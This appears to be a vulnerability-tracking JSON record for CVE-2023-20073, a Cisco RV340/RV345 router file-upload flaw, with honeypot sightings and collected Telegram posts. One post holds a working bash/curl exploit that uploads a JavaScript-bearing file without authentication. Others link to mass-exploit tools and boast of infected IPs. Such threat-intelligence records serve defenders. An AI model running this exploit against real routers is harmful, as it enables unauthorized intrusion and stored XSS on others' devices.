{"vulnerability": "CVE-2023-20073", "sightings": [{"uuid": "00a36ef5-7243-46c0-8770-fb71767cc8a4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2023-20073", "type": "exploited", "source": "The Shadowserver (honeypot/exploited-vulnerabilities) - (2025-11-09)", "content": "", "creation_timestamp": "2025-11-09T00:00:00.000000Z"}, {"uuid": "12edd3c0-5ae0-4cfc-a920-ca02a419b8e7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2023-20073", "type": "seen", "source": "The Shadowserver (honeypot/common-vulnerabilities) - (2026-04-28)", "content": "", "creation_timestamp": "2026-04-28T00:00:00.000000Z"}, {"uuid": "8df3b2b9-8ae1-4177-af4d-11f1cd0e95a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2023-20073", "type": "published-proof-of-concept", "source": "https://t.me/proxy_bar/1687", "content": "CVE-2023-20073\n\u0417\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 \u0431\u0435\u0437 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u043f\u043e\u0434\u043b\u0438\u043d\u043d\u043e\u0441\u0442\u0438  (XSS) \u0432 VPN-\u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0442\u043e\u0440\u0430\u0445:\nCisco RV340, RV340W, RV345, RV345P \nUsage:\n#!/usr/bin/bash\nTARGET=\"https://0.0.0.0\"; \\\nFILENAME=\"login.html\"; \\\necho \"CVE-2023-20073 exploit test.alert('JS-test')\" > $FILENAME; \\\ncurl -ksX POST \"$TARGET/api/operations/ciscosb-file:form-file-upload\" -H \"Authorization: 1\" -F \"pathparam=Portal\" -F \"fileparam=${FILENAME}\" -F \"file.path=${FILENAME}\" -F \"file=@${FILENAME};type=application/octet-stream\"; \\\necho \"Access the uploaded file through the following link: $TARGET/$FILENAME\"\n\n#cisco", "creation_timestamp": "2023-08-19T14:06:35.000000Z"}, {"uuid": "7cef66e5-2ae9-4590-ae90-4863f419b40c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2023-20073", "type": "published-proof-of-concept", "source": "https://t.me/codeb0ss/1051", "content": "CVE-2023-20073 , enjoy , 7K Infected IPs", "creation_timestamp": "2024-09-17T21:31:17.000000Z"}, {"uuid": "3f744001-8080-4e72-861a-3f5913ebdc1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2023-20073", "type": "seen", "source": "https://t.me/cibsecurity/61484", "content": "\u203c CVE-2023-20073 \u203c\n\nA vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-04-05T20:26:37.000000Z"}, {"uuid": "8c85d811-8892-4ed3-a8d3-ea8213b0678f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2023-20073", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/8883", "content": "#exploit\n1. CVE-2023-20073:\nCisco RV340/RV340W/RV345/RV345P VPN Routers Arbitrary File Upload\nhttps://github.com/RegularITCat/CVE-2023-20073\n\n2. CVE-2023-3836:\nArbitrary File Upload/Upload Webshell\nhttps://github.com/codeb0ss/CVE-2023-3836\n\n3. CVE-2023-34634:\nGreenshot <=1.2.10 - arbitrary code execution because .NET content is insecurely deserialized when a .greenshot file is opened\nhttps://github.com/radman404/CVE-2023-34634", "creation_timestamp": "2023-08-20T20:43:57.000000Z"}, {"uuid": "4a5c2261-85e8-476e-9009-ebb24a0f1a8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2023-20073", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4949", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aMass Exploit - CVE-2023-20073  - Cisco  VPN Routers - [Unauthenticated Arbitrary File Upload and Stored XSS]\nURL\uff1ahttps://github.com/codeb0ss/CVE-2023-20073-\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-08-20T02:49:35.000000Z"}, {"uuid": "8cf2802d-7bc1-453b-8b0e-e1b351141b1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2023-20073", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/4948", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2023\n\u63cf\u8ff0\uff1aMass Exploit - CVE-2023-20073  - Cisco  VPN Routers - [Unauthenticated Arbitrary File Upload and Stored XSS]\nURL\uff1ahttps://github.com/codeb0ss/CVE-2023-20073-\n\n\u6807\u7b7e\uff1a#CVE-2023", "creation_timestamp": "2023-08-20T02:49:35.000000Z"}, {"uuid": "b5cbd17a-052b-487e-a901-288f6a10c248", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2023-20073", "type": "published-proof-of-concept", "source": "https://t.me/MrVGunz/1072", "content": "CVE-2023-20073: Cisco RV340\u060c RV340W\u060c RV345 \u0648 RV345P Dual WAN Gigabit VPN Routers - \u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc \u062f\u0644\u062e\u0648\u0627\u0647 \u0628\u062f\u0648\u0646 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a\nPOC: https://github.com/RegularITCat/CVE-2023-20073\n\u0646\u062a\u0627\u06cc\u062c \u0642\u0627\u0628\u0644 \u0642\u0628\u0648\u0644\u06cc \u0645\u0634\u0627\u0647\u062f\u0647 \u0646\u0634\u062f\u0646\u062f.\n\nCVE-2023-20073 : Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers - unauthenticated upload arbitrary files \nPOC : https://github.com/RegularITCat/CVE-2023-20073\nNo acceptable results were observed.", "creation_timestamp": "2024-05-06T11:39:54.000000Z"}]}